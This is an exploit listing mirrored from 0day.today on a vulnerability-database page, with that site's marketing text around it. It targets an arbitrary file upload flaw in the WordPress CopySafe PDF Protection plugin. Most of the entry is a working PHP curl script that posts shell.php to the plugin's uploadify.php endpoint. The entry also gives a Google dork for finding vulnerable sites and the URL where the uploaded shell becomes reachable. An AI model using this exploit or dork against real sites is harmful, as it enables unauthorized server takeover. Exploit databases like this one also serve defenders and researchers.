Lucene search
K

Wordpress Plugin CopySafe PDF Protection Shell Upload (0day) Vulnerability

🗓️ 03 Jun 2014 00:00:00Reported by AloulouType 
zdt
 zdt
🔗 0day.today👁 39 Views

Wordpress Plugin CopySafe PDF Protection Shell Upload Vulnerabilit

Code
############################################################################

#Title : Wordpress Plugin CopySafe PDF Protection Shell Upload Vulnerability    
# Author : Aloulou                                              
# Date : 01/06/2014                                                     
# Facebook : http://www.facebook.com/Aloulou.TN                                
# Email: [email protected]
# Vendor : wordpress.org                                                     
# Google Dork : inurl:/plugins/wp-copysafe-pdf/
# Tested on : Linux 
                      
############################################################################

Exploit: 


<?php

$uploadfile="shell.php";

$ch = curl_init("http://127.0.0.1/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,
array('wpcsp_file'=>"@$uploadfile",'error'=>'-1'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

"0"---->successful

NOTE:showing output "0" means it is successfully uploaded with zero errors!

ShellAccess:

    
http://127.0.0.1/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/shell.php


Demo:http://thatisallfornow.com


# Greeting to : Tunisia ,  CyberPink , AnonBoy and all muslims 
 

############################################################################

#  0day.today [2018-02-17]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation